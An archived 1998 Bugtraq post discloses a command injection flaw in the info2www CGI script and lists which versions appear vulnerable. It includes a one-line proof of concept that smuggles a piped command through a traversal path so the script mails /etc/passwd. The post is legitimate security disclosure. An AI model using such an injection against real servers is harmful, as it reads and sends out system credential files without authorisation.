<a href="http://g.adspeed.net/ad.php?do=clk&zid=14678&wd=728&ht=90&pair=as" target="_top"><img style="border:0px;" src="http://g.adspeed.net/ad.php?do=img&zid=14678&wd=728&ht=90&pair=as" alt="i" width="728" height="90"/></a>

Nmap Security Scanner

Docs
Security Lists

Full Disclosure

More
Security Tools

Packet crafters

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

edgeos

Bugtraq: Vulnerabilites in some versions of info2www CGI

Vulnerabilites in some versions of info2www CGI

From: Niall Smart <njs3_at_DOC.IC.AC.UK>
Date: Tue, 3 Mar 1998 11:26:49 +0000

Hi,

Some versions of the info2www CGI blindly open files:

$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passw
d|)'
$
You have new mail.
$

Trying to track down which versions of info2www have this bug and which
don't has been difficult, there are lots of variants out there, some
of which aren't vulnerable. Instead of trying to make a list of versions
which are vulnerable I'll just say that:

- if it has no version number, its probably vulnerable
- the uuencoded version at CPAN is corrupt, and the one
which the README file tells you to get is vulnerable
- version 1.1 is vulnerable
- version 1.2.x seem ok (but I'm no perl expert)

Apparently info2www is based on info2html and infogate, so these may
have problems too.

Niall
Received on Mar 03 1998

This message: [ Message body ]
Next message: Joe Zbiciak: "Re: strcpy versus strncpy"
Previous message: Dean Gaudet: "Re: strcpy versus strncpy"
In reply to: Morten Welinder: "strcpy versus strncpy"
Next in thread: Aleph One: "Re: strcpy versus strncpy"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ]

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]

edgeos